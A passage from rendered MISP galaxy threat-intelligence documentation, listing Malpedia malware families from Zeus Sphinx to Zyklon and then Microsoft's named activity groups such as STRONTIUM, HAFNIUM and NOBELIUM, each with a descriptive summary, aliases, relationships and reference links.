  • 2016/02 v1.0.1.2 (Zeus Sphinx size: 1.5 MB)

  • 2016/04 v1.0.2.0 (Zeus Sphinx size: 1.5 MB)

Zeus OpenSSL on the other hand has the following versioning ("fast increase"):

  • 2016/05 v1.5.4.0 (Zeus OpenSSL size: 1.2 MB)

  • 2017/01 v1.14.8.0 (Zeus OpenSSL size: 1.8 MB)

  • 2017/01 v1.15.0.0 (Zeus OpenSSL size: 2.2 MB)

The tag is: misp-galaxy:malpedia="Zeus Sphinx"

Zeus Sphinx is also known as:

Table 5061. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx

https://securityintelligence.com/posts/zeus-sphinx-back-in-business-some-core-modifications-arise/

https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/

https://securityaffairs.co/wordpress/39592/cyber-crime/sphinx-variant-zeus-trojan.html

Zezin

The tag is: misp-galaxy:malpedia="Zezin"

Zezin is also known as:

Table 5062. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zezin

https://twitter.com/siri_urz/status/923479126656323584

zgRAT

zgRAT is a Remote Access Trojan that sometimes drops other malware such as AgentTesla. zgRAT also has an infostealer capability that targets browser information and cryptocurrency wallets. It usually spreads via USB or phishing emails with .zip/.lnk/.bat/.xlsx attachments and the like.

The tag is: misp-galaxy:malpedia="zgRAT"

zgRAT is also known as:

Table 5063. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities

https://bazaar.abuse.ch/browse/signature/zgRAT/

https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US

https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/

ZingoStealer

An information stealer written in .NET.

The tag is: misp-galaxy:malpedia="ZingoStealer"

ZingoStealer is also known as:

  • Ginzo

Table 5066. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zingo_stealer

https://blog.talosintelligence.com/haskers-gang-zingostealer/

https://blogs.blackberry.com/en/2022/05/threat-thursday-zingostealer

ZitMo

The tag is: misp-galaxy:malpedia="ZitMo"

ZitMo is also known as:

  • ZeuS-in-the-Mobile

Table 5067. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zitmo

https://mobisec.reyammer.io/slides

https://securelist.com/zeus-in-the-mobile-facts-and-theories/36424/

ZiyangRAT

The tag is: misp-galaxy:malpedia="ZiyangRAT"

ZiyangRAT is also known as:

Table 5068. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ziyangrat

https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators

Zloader

This family describes the (initially small) loader, which downloads Zeus OpenSSL.

In June 2016, a new loader was dubbed DEloader by Fortinet. It has some functions borrowed from Zeus 2.0.8.9 (e.g. the versioning, nrv2b, binstorage-labels), but more importantly, it downloaded a Zeus-like banking trojan (→ Zeus OpenSSL). Furthermore, the loader shared its versioning with the Zeus OpenSSL it downloaded. The initial samples from May 2016 were small (17920 bytes). At some point, visualEncrypt/Decrypt was added, e.g. in v1.11.0.0 (September 2016) with size 27648 bytes. In January 2017 with v1.15.0.0, obfuscation was added, which blew the size up to roughly 80k, and the loader became known as Zloader aka Terdot. These changes may be related to the Moskalvzapoe Distribution Network, which started the distribution of it at the same time.

Please note that IBM X-Force decided to call win.zloader/win.zeus_openssl "Zeus Sphinx", after mentioning it as "a new version of Zeus Sphinx" in their initial post in August 2016. Malpedia thus lists the alias "Zeus XSphinx" for win.zeus_openssl - the X to refer to IBM X-Force.

The tag is: misp-galaxy:malpedia="Zloader"

Zloader is also known as:

  • DELoader

  • Terdot

Table 5069. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader

https://blag.nullteilerfrei.de/2020/05/24/zloader-string-obfuscation/

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/

https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/

https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/

https://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/

https://resources.malwarebytes.com/files/2020/05/The-Silent-Night-Zloader-Zbot_Final.pdf

https://securityintelligence.com/zeus-sphinx-pushes-empty-configuration-files-what-has-the-sphinx-got-cooking/

https://johannesbader.ch/blog/the-dga-of-zloader/

https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/

https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/

https://aaqeel01.wordpress.com/2021/10/18/zloader-reversing/

https://blog.vincss.net/2022/04/re026-a-deep-dive-into-zloader-the-silent-night.html

https://www.youtube.com/watch?v=mhX-UoaYnOM

https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries

https://unit42.paloaltonetworks.com/api-hammering-malware-families/

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/

https://www.lac.co.jp/lacwatch/people/20201106_002321.html

https://securityintelligence.com/around-the-world-with-zeus-sphinx-from-canada-to-australia-and-back/

https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware

https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html

https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/

https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/

https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf

https://web.archive.org/web/20200929145931/https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/

https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/

https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/

https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit

https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/

https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/

https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-strrat-zloader-honeygain

https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf

https://www.sentinelone.com/labs/hide-and-seek-new-zloader-infection-chain-comes-with-improved-stealth-and-evasion-mechanisms/

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/zloader-campaigns-at-a-glance

https://twitter.com/VK_Intel/status/1294320579311435776

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/

https://clickallthethings.wordpress.com/2020/09/21/zloader-xlm-update-macro-code-and-behavior-change/

https://noticeofpleadings.com/zloader/

https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems

https://labs.k7computing.com/?p=22458

https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex

https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://blag.nullteilerfrei.de/2020/06/11/api-hashing-in-the-zloader-malware/

https://info.phishlabs.com/blog/surge-in-zloader-attacks-observed

https://cybleinc.com/2021/04/19/zloader-returns-through-spelevo-exploit-kit-phishing-campaign/

https://securityliterate.com/chantays-resume-investigating-a-cv-themed-zloader-malware-campaign/

https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/

https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/

https://blogs.quickheal.com/zloader-entailing-different-office-files/

https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/

https://info.phishlabs.com/blog/zloader-dominates-email-payloads-in-q1

https://clickallthethings.wordpress.com/2020/06/19/zloader-vba-r1c1-references-and-other-tomfoolery/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://blog.malwarebytes.com/threat-analysis/2020/11/malsmoke-operators-abandon-exploit-kits-in-favor-of-social-engineering-scheme/

https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks

https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html

https://www.proofpoint.com/us/blog/threat-insight/zloader-loads-again-new-zloader-variant-returns

https://www.forcepoint.com/blog/x-labs/invoicing-spam-campaigns-malware-zloader

https://www.hornetsecurity.com/en/threat-research/zloader-email-campaign-using-mhtml-to-download-and-decrypt-xls/

https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/

https://documents.trendmicro.com/assets/txt/IOCs-zloader-campaigns-at-a-glance.txt

https://www.youtube.com/watch?v=QBoj6GB79wM

https://twitter.com/ffforward/status/1324281530026524672

https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://blog.alyac.co.kr/3322

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

ZStealer

Information Stealer used by Void Balaur.

The tag is: misp-galaxy:malpedia="ZStealer"

ZStealer is also known as:

  • Z*Stealer

Table 5071. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zstealer

https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf

https://twitter.com/Arkbird_SOLG/status/1458973883068043264

Zumanek

According to ESET, this malware family was active exclusively in Brazil until the middle of 2020. It is identified by its method for obfuscating strings: it creates a function for each character of the alphabet and then concatenates the result of calling the correct functions in sequence.

The tag is: misp-galaxy:malpedia="Zumanek"

Zumanek is also known as:

Table 5072. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zumanek

https://www.welivesecurity.com/2021/12/15/dirty-dozen-latin-america-amavaldo-zumanek/

https://www.welivesecurity.com/br/2018/01/17/zumanek-malware-tenta-roubar-credenciais-de-servicos/

ZUpdater

The tag is: misp-galaxy:malpedia="ZUpdater"

ZUpdater is also known as:

  • Zpevdo

Table 5073. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zupdater

https://app.any.run/tasks/ea024149-8e83-41c0-b0ed-32ec38dea4a6/

ZXShell

According to FireEye, ZXSHELL is a backdoor that can be downloaded from the internet, particularly Chinese hacker websites. The backdoor can launch port scans, run a keylogger, capture screenshots, set up an HTTP or SOCKS proxy, launch a reverse command shell, cause SYN floods, and transfer/delete/run files. The publicly available version of the tool provides a graphical user interface that malicious actors can use to interact with victim backdoors. Simplified Chinese is the language used for the bundled ZXSHELL documentation.

The tag is: misp-galaxy:malpedia="ZXShell"

ZXShell is also known as:

  • Sensocode

Table 5075. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell

https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox

https://lab52.io/blog/apt27-rootkit-updates/

https://content.fireeye.com/apt-41/rpt-apt41

https://attack.mitre.org/groups/G0096

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.secureworks.com/research/threat-profiles/bronze-keystone

https://mp.weixin.qq.com/s/K1uBLGqD8kgsIp1yTyYBfw

https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf

https://www.secureworks.com/research/threat-profiles/bronze-union

https://blogs.cisco.com/security/talos/opening-zxshell

https://attack.mitre.org/groups/G0001/

https://meltx0r.github.io/tech/2019/09/19/emissary-panda-apt.html

https://risky.biz/whatiswinnti/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor

https://github.com/smb01/zxshell

https://unit42.paloaltonetworks.com/atoms/iron-taurus/

https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf

ZxxZ

Cisco Talos attributes this backdoor with moderate confidence to the Bitter APT.

The tag is: misp-galaxy:malpedia="ZxxZ"

ZxxZ is also known as:

  • MuuyDownloader

Table 5076. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zxxz

https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/

https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html

Zyklon

According to FireEye, Zyklon or Zyklon HTTP is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal. The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so. The malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery, from browsers and email software. Zyklon also provides a very efficient mechanism to monitor the spread and impact.

The tag is: misp-galaxy:malpedia="Zyklon"

Zyklon is also known as:

Table 5077. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zyklon

https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html

https://blog.talosintelligence.com/2017/05/modified-zyklon-and-plugins-from-india.html

Microsoft Activity Group actor

Activity groups as described by Microsoft.

Microsoft Activity Group actor is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Various

PROMETHIUM

PROMETHIUM is an activity group that has been active as early as 2012. The group primarily uses Truvasys, a first-stage malware that has been in circulation for several years. Truvasys has been involved in several attack campaigns, where it has masqueraded as one of several common computer utilities, including WinUtils, TrueCrypt, WinRAR, or SanDisk. In each of the campaigns, Truvasys malware evolved with additional features—this shows a close relationship between the activity groups behind the campaigns and the developers of the malware.

The tag is: misp-galaxy:microsoft-activity-group="PROMETHIUM"

PROMETHIUM has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="PROMETHIUM - G0056" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="PROMETHIUM" with estimative-language:likelihood-probability="likely"

Table 5078. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/

NEODYMIUM

NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird. This backdoor’s characteristics closely match FinFisher, a government-grade commercial surveillance package. Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks.

The tag is: misp-galaxy:microsoft-activity-group="NEODYMIUM"

NEODYMIUM has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="NEODYMIUM - G0055" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="NEODYMIUM" with estimative-language:likelihood-probability="likely"

Table 5079. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/

TERBIUM

Microsoft Threat Intelligence identified similarities between this recent attack and previous 2012 attacks against tens of thousands of computers belonging to organizations in the energy sector. Microsoft Threat Intelligence refers to the activity group behind these attacks as TERBIUM, following our internal practice of assigning rogue actors chemical element names.

The tag is: misp-galaxy:microsoft-activity-group="TERBIUM"

TERBIUM has relationships with:

  • similar: misp-galaxy:threat-actor="TERBIUM" with estimative-language:likelihood-probability="likely"

Table 5080. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2016/12/09/windows-10-protection-detection-and-response-against-recent-attacks/

STRONTIUM

STRONTIUM has been active since at least 2007. Whereas most modern untargeted malware is ultimately profit-oriented, STRONTIUM mainly seeks sensitive information. Its primary institutional targets have included government bodies, diplomatic institutions, and military forces and installations in NATO member states and certain Eastern European countries. Additional targets have included journalists, political advisors, and organizations associated with political activism in central Asia. STRONTIUM is an activity group that usually targets government agencies, diplomatic institutions, and military organizations, as well as affiliated private sector organizations such as defense contractors and public policy research institutes. Microsoft has attributed more 0-day exploits to STRONTIUM than any other tracked group in 2016. STRONTIUM frequently uses compromised e-mail accounts from one victim to send malicious e-mails to a second victim and will persistently pursue specific targets for months until they are successful in compromising the victims’ computer.

The tag is: misp-galaxy:microsoft-activity-group="STRONTIUM"

STRONTIUM is also known as:

  • APT 28

  • APT28

  • Pawn Storm

  • Fancy Bear

  • Sednit

  • TsarTeam

  • TG-4127

  • Group-4127

  • Sofacy

  • Grey-Cloud

STRONTIUM has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT28 - G0007" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="APT28" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="奇幻熊 - APT-C-20" with estimative-language:likelihood-probability="likely"

Table 5081. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/

http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_A_Profile_Of_A_Persistent_Adversary_English.pdf

https://blogs.technet.microsoft.com/mmpc/2015/11/16/microsoft-security-intelligence-report-strontium/

https://blogs.microsoft.com/on-the-issues/2018/08/20/we-are-taking-new-steps-against-broadening-threats-to-democracy/

https://www.bleepingcomputer.com/news/security/microsoft-disrupts-apt28-hacking-campaign-aimed-at-us-midterm-elections/

DUBNIUM

DUBNIUM (which shares indicators with what Kaspersky researchers have called DarkHotel) is one of the activity groups that has been very active in recent years, and has many distinctive features.

The tag is: misp-galaxy:microsoft-activity-group="DUBNIUM"

DUBNIUM is also known as:

  • darkhotel

DUBNIUM has relationships with:

  • similar: misp-galaxy:threat-actor="DarkHotel" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="Darkhotel - APT-C-06" with estimative-language:likelihood-probability="likely"

Table 5082. Table References

Links

https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/

https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2

https://blogs.technet.microsoft.com/mmpc/2016/06/20/reverse-engineering-dubniums-flash-targeting-exploit/

https://blogs.technet.microsoft.com/mmpc/2016/07/14/reverse-engineering-dubnium-stage-2-payload-analysis/

PLATINUM

PLATINUM has been targeting its victims since at least as early as 2009, and may have been active for several years prior. Its activities are distinctly different not only from those typically seen in untargeted attacks, but from many targeted attacks as well. A large share of targeted attacks can be characterized as opportunistic: the activity group changes its target profiles and attack geographies based on geopolitical seasons, and may attack institutions all over the world. Like many such groups, PLATINUM seeks to steal sensitive intellectual property related to government interests, but its range of preferred targets is consistently limited to specific governmental organizations, defense institutes, intelligence agencies, diplomatic institutions, and telecommunication providers in South and Southeast Asia. The group’s persistent use of spear phishing tactics (phishing attempts aimed at specific individuals) and access to previously undiscovered zero-day exploits have made it a highly resilient threat.

The tag is: misp-galaxy:microsoft-activity-group="PLATINUM"

PLATINUM has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="PLATINUM - G0068" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="PLATINUM" with estimative-language:likelihood-probability="likely"

Table 5083. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2016/04/26/digging-deep-for-platinum/

http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf

BARIUM

Microsoft Threat Intelligence associates Winnti with multiple activity groups—collections of malware, supporting infrastructure, online personas, victimology, and other attack artifacts that the Microsoft intelligent security graph uses to categorize and attribute threat activity. Microsoft labels activity groups using code names derived from elements in the periodic table. In the case of this malware, the activity groups strongly associated with Winnti are BARIUM and LEAD. But even though they share the use of Winnti, the BARIUM and LEAD activity groups are involved in very different intrusion scenarios. BARIUM begins its attacks by cultivating relationships with potential victims—particularly those working in Business Development or Human Resources—on various social media platforms. Once BARIUM has established rapport, they spear-phish the victim using a variety of unsophisticated malware installation vectors, including malicious shortcut (.lnk) files with hidden payloads, compiled HTML help (.chm) files, or Microsoft Office documents containing macros or exploits. Initial intrusion stages feature the Win32/Barlaiy implant—notable for its use of social network profiles, collaborative document editing sites, and blogs for C&C. Later stages of the intrusions rely upon Winnti for persistent access. The majority of victims recorded to date have been in electronic gaming, multimedia, and Internet content industries, although occasional intrusions against technology companies have occurred.

The tag is: misp-galaxy:microsoft-activity-group="BARIUM"

BARIUM has relationships with:

  • similar: misp-galaxy:threat-actor="APT41" with estimative-language:likelihood-probability="likely"

Table 5084. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/

LEAD

In contrast, LEAD has established a far greater reputation for industrial espionage. In the past few years, LEAD’s victims have included:

  • Multinational, multi-industry companies involved in the manufacture of textiles, chemicals, and electronics

  • Pharmaceutical companies

  • A company in the chemical industry

  • University faculty specializing in aeronautical engineering and research

  • A company involved in the design and manufacture of motor vehicles

  • A cybersecurity company focusing on protecting industrial control systems

During these intrusions, LEAD’s objective was to steal sensitive data, including research materials, process documents, and project plans. LEAD also steals code-signing certificates to sign its malware in subsequent attacks. In most cases, LEAD’s attacks do not feature any advanced exploit techniques. The group also does not make special effort to cultivate victims prior to an attack. Instead, the group often simply emails a Winnti installer to potential victims, relying on basic social engineering tactics to convince recipients to run the attached malware. In some other cases, LEAD gains access to a target by brute-forcing remote access login credentials, performing SQL injection, or exploiting unpatched web servers, and then they copy the Winnti installer directly to compromised machines.

The tag is: misp-galaxy:microsoft-activity-group="LEAD"

LEAD has relationships with:

  • similar: misp-galaxy:threat-actor="APT41" with estimative-language:likelihood-probability="likely"

Table 5085. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/

ZIRCONIUM

In addition to strengthening generic detection of EoP exploits, Microsoft security researchers are actively gathering threat intelligence and indicators attributable to ZIRCONIUM, the activity group using the CVE-2017-0005 exploit.

The tag is: misp-galaxy:microsoft-activity-group="ZIRCONIUM"

ZIRCONIUM has relationships with:

  • similar: misp-galaxy:threat-actor="APT31" with estimative-language:likelihood-probability="likely"

Table 5086. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2017/03/27/detecting-and-mitigating-elevation-of-privilege-exploit-for-cve-2017-0005/

GALLIUM

Microsoft Threat Intelligence Center (MSTIC) is raising awareness of the ongoing activity by a group we call GALLIUM, targeting telecommunication providers. When Microsoft customers have been targeted by this activity, we notified them directly with the relevant information they need to protect themselves. By sharing the detailed methodology and indicators related to GALLIUM activity, we’re encouraging the security community to implement active defenses to secure the broader ecosystem from these attacks. To compromise targeted networks, GALLIUM targets unpatched internet-facing services using publicly available exploits and has been known to target vulnerabilities in WildFly/JBoss. Once persistence is established in a network, GALLIUM uses common techniques and tools like Mimikatz to obtain credentials that allow for lateral movement across the target network. Within compromised networks, GALLIUM makes no attempt to obfuscate its intent and is known to use common versions of malware and publicly available toolkits with small modifications. The operators rely on low-cost and easy-to-replace infrastructure that consists of dynamic-DNS domains and regularly reused hop points. This activity from GALLIUM has been identified predominantly through 2018 to mid-2019. GALLIUM is still active; however, activity levels have dropped when compared to what was previously observed.

The tag is: misp-galaxy:microsoft-activity-group="GALLIUM"

GALLIUM is also known as:

  • Operation Soft Cell

GALLIUM has relationships with:

  • similar: misp-galaxy:threat-actor="Operation Soft Cell" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="GALLIUM" with estimative-language:likelihood-probability="almost-certain"

Table 5087. Table References

Links

https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

PARINACOTA

One actor that has emerged in this trend of human-operated attacks is an active, highly adaptive group that frequently drops Wadhrama as payload. PARINACOTA impacts three to four organizations every week and appears quite resourceful: during the 18 months that we have been monitoring it, we have observed the group change tactics to match its needs and use compromised machines for various purposes, including cryptocurrency mining, sending spam emails, or proxying for other attacks. The group’s goals and payloads have shifted over time, influenced by the type of compromised infrastructure, but in recent months, they have mostly deployed the Wadhrama ransomware. The group most often employs a smash-and-grab method, whereby they attempt to infiltrate a machine in a network and proceed with subsequent ransom in less than an hour. There are outlier campaigns in which they attempt reconnaissance and lateral movement, typically when they land on a machine and network that allows them to quickly and easily move throughout the environment. PARINACOTA typically brute-forces its way into servers that have Remote Desktop Protocol (RDP) exposed to the internet, with the goal of moving laterally inside a network or performing further brute-force activities against targets outside the network. This allows the group to expand compromised infrastructure under their control. Frequently, the group targets built-in local administrator accounts or a list of common account names. In other instances, the group targets Active Directory (AD) accounts that they compromised or have prior knowledge of, such as service accounts of known vendors. The group adopted the RDP brute force technique that the older ransomware called Samas (also known as SamSam) infamously used. Other malware families like GandCrab, MegaCortex, LockerGoga, Hermes, and RobbinHood have also used this method in targeted ransomware attacks. PARINACOTA, however, has also been observed to adapt to any path of least resistance they can utilize. For instance, they sometimes discover unpatched systems and use disclosed vulnerabilities to gain initial access or elevate privileges.

The tag is: misp-galaxy:microsoft-activity-group="PARINACOTA"

PARINACOTA has relationships with:

  • uses: misp-galaxy:ransomware="Wadhrama" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="PARINACOTA" with estimative-language:likelihood-probability="almost-certain"

Table 5088. Table References

Links

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

GADOLINIUM

GADOLINIUM is a nation-state activity group that has been compromising targets for nearly a decade with a worldwide focus on the maritime and health industries. As with most threat groups, GADOLINIUM tracks the tools and techniques of security practitioners looking for new techniques they can use or modify to create new exploit methods. Historically, GADOLINIUM used custom-crafted malware families that analysts can identify and defend against. In response, over the last year GADOLINIUM has begun to modify portions of its toolchain to use open-source toolkits to obfuscate their activity and make it more difficult for analysts to track. Because cloud services frequently offer a free trial or one-time payment (PayGo) account offerings, malicious actors have found ways to take advantage of these legitimate business offerings. By establishing free or PayGo accounts, they can use cloud-based technology to create a malicious infrastructure that can be established quickly then taken down before detection or given up at little cost.

The tag is: misp-galaxy:microsoft-activity-group="GADOLINIUM"

GADOLINIUM has relationships with:

  • similar: misp-galaxy:threat-actor="APT40" with estimative-language:likelihood-probability="likely"

Table 5089. Table References

Links

https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/

HAFNIUM

HAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs. HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control. Once they’ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA. In campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets’ environments. HAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.

The tag is: misp-galaxy:microsoft-activity-group="HAFNIUM"

HAFNIUM has relationships with:

  • similar: misp-galaxy:threat-actor="HAFNIUM" with estimative-language:likelihood-probability="almost-certain"

Table 5090. Table References

Links

https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/

NOBELIUM

Threat actor behind the attacks against SolarWinds, the SUNBURST backdoor, TEARDROP malware, GoldMax malware.

The tag is: misp-galaxy:microsoft-activity-group="NOBELIUM"

NOBELIUM has relationships with:

  • similar: misp-galaxy:threat-actor="UNC2452" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:backdoor="SUNBURST" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="TEARDROP" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="GoldMax" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="SNOWYAMBER" with estimative-language:likelihood-probability="likely"

